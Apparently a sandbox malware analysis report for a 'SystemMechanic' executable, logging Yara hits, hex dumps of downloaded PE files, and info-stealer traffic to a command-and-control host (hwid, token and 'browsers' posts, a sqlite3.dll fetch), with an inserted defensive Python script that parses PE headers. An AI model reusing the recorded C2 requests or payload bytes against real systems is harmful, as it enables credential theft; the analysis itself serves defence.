Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic TCP traffic: 192.168.2.5:49750 -> 91.215.85.66:15647
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:26:55 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 28 Apr 2024 23:15:02 GMTETag: "4ba00-617304e711e86"Accept-Ranges: bytesContent-Length: 309760Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a cd db 04 1e ac b5 57 1e ac b5 57 1e ac b5 57 13 fe 6a 57 3e ac b5 57 13 fe 55 57 99 ac b5 57 13 fe 54 57 30 ac b5 57 17 d4 26 57 1d ac b5 57 1e ac b4 57 6f ac b5 57 ab 32 50 57 1f ac b5 57 13 fe 6e 57 1f ac b5 57 ab 32 6b 57 1f ac b5 57 52 69 63 68 1e ac b5 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 7b b5 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 08 01 00 00 30 60 01 00 00 00 00 4f 3e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 61 01 00 04 00 00 9b 51 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 84 01 00 28 00 00 00 00 90 5f 01 a8 b9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 61 01 d8 13 00 00 f0 21 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 79 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f3 07 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 6d 00 00 00 20 01 00 00 6e 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 f3 
5d 01 00 90 01 00 00 72 01 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 b9 01 00 00 90 5f 01 00 ba 01 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 13 00 00 00 50 61 01 00 14 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
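Each `application/x-msdos-program` response above is reproduced as a raw byte dump, which is enough to triage the delivered file without the file itself. The Python below is an added example, not part of the report: it embeds the first 0x2a8 bytes of the first dump (the 309760-byte response), transcribed from the hex, and parses just the DOS header, COFF header, optional-header magic and entry point, and the section table. From that it reports the target machine, the link timestamp, the DOS stub text (MSVC's "cannot be run in DOS mode" here, versus the Delphi-style "must be run under Win32" in the third dump), any section that is both writable and executable, any section whose in-memory size dwarfs its on-disk size, and whether the section table accounts for the HTTP Content-Length. It tolerates a truncated prefix, which is what a sandbox dump usually is.

```python
import re
import struct
from datetime import datetime, timezone

# First 0x2a8 bytes of the first x-msdos-program response in the report above
# (Content-Length 309760): DOS header, stub, Rich header, COFF/optional header
# and the five section headers. Nothing past the section table is needed.
PE_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"
    "00000000000000000000000000000000" "000000000000000000000000e8000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "5acddb041eacb5571eacb5571eacb557" "13fe6a573eacb55713fe555799acb557"
    "13fe545730acb55717d426571dacb557" "1eacb4576facb557ab3250571facb557"
    "13fe6e571facb557ab326b571facb557" "526963681eacb5570000000000000000"
    "0000000000000000504500004c010500" "167bb5630000000000000000e0000201"
    "0b010c00000801000030600100000000" "4f3e0000001000000020010000004000"
    "00100000000200000500010000000000" "05000100000000000070610100040000"
    "9b510500020000800000100000100000" "00001000001000000000000010000000"
    "00000000000000009484010028000000" "00905f01a8b901000000000000000000"
    "000000000000000000506101d8130000" "f0210100380000000000000000000000"
    "00000000000000000000000000000000" "b0790100400000000000000000000000"
    "002001008c0100000000000000000000" "00000000000000000000000000000000"
    # section headers: name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, (reloc/line fields), Characteristics
    "2e74657874000000" "f3070100" "00100000" "00080100" "00040000" "000000000000000000000000" "20000060"  # .text
    "2e72646174610000" "626d0000" "00200100" "006e0000" "000c0100" "000000000000000000000000" "40000040"  # .rdata
    "2e64617461000000" "60f35d01" "00900100" "00720100" "007a0100" "000000000000000000000000" "400000c0"  # .data
    "2e72737263000000" "a8b90100" "00905f01" "00ba0100" "00ec0200" "000000000000000000000000" "40000040"  # .rsrc
    "2e72656c6f630000" "d8130000" "00506101" "00140000" "00a60400" "000000000000000000000000" "42000040"  # .reloc
)

MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "ARM64"}
IMAGE_FILE_DLL, SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x2000, 0x20000000, 0x80000000


def parse_pe_prefix(data):
    """Triage whatever prefix of a PE file is available. Raises ValueError if it
    is not a PE at all; sets 'truncated' when the section table is cut off."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at 0x%x" % e_lfanew)
    # The stub text hints at the toolchain: MSVC writes 'cannot be run in DOS
    # mode', Delphi/Inno images write 'must be run under Win32'.
    m = re.search(rb"This program [ -~]+", data[0x40:e_lfanew])
    stub = m.group().decode() if m else None
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = entry = None
    if opt_off + 20 <= len(data):
        magic = struct.unpack_from("<H", data, opt_off)[0]            # 0x10b PE32, 0x20b PE32+
        entry = struct.unpack_from("<I", data, opt_off + 16)[0]       # AddressOfEntryPoint (RVA)
    sections = []
    for i in range(nsec):
        off = opt_off + opt_size + 40 * i
        if off + 40 > len(data):
            break                                   # header cut off: stop, do not read garbage
        vsize, va, rsize, rptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("latin-1"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rsize, "raw_ptr": rptr,
                         "flags": struct.unpack_from("<I", data, off + 36)[0]})
    entry_section = next((s["name"] for s in sections if entry is not None and
                          s["virtual_address"] <= entry < s["virtual_address"] + max(s["virtual_size"], s["raw_size"])),
                         None)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "pe32plus": magic == 0x20B,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "timestamp": ts,
        "compile_time": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "dos_stub": stub,
        "num_sections": nsec,
        "sections": sections,
        "truncated": len(sections) < nsec,
        "entry_section": entry_section,
        # writable and executable at once: code that rewrites itself in place
        "rwx_sections": [s["name"] for s in sections
                         if s["flags"] & SCN_MEM_EXECUTE and s["flags"] & SCN_MEM_WRITE],
        # in-memory size far above on-disk size: a large zero-filled region
        "inflated_sections": [s["name"] for s in sections
                              if s["raw_size"] and s["virtual_size"] > 8 * s["raw_size"]],
        # end of the last section on disk; compare with the HTTP Content-Length
        "file_size_from_sections": max((s["raw_ptr"] + s["raw_size"] for s in sections), default=None),
    }


if __name__ == "__main__":
    for key, value in parse_pe_prefix(PE_PREFIX).items():
        print(key, value)
```

For this dump the last section (.reloc) ends at file offset 0x4ba00 = 309760, exactly the Content-Length, so the transfer was a complete, unappended PE32 built for i386 and linked on 2023-01-04. No section is writable and executable, but .data declares an in-memory size roughly 240 times its on-disk size, a large zero-filled area worth a look given that the report flags unpacking and PE-section-rights changes. Passing a shorter slice (for instance the first 0x200 bytes) returns `truncated=True` with an empty section list instead of misreading the cut-off header.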
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:26:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 
00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.172.128.150Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="hwid"E86E13454DA6894617998------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="build"default100------BGHIIJDGHCBFIECBKEGH--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKFHost: 185.172.128.150Content-Length: 6611Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
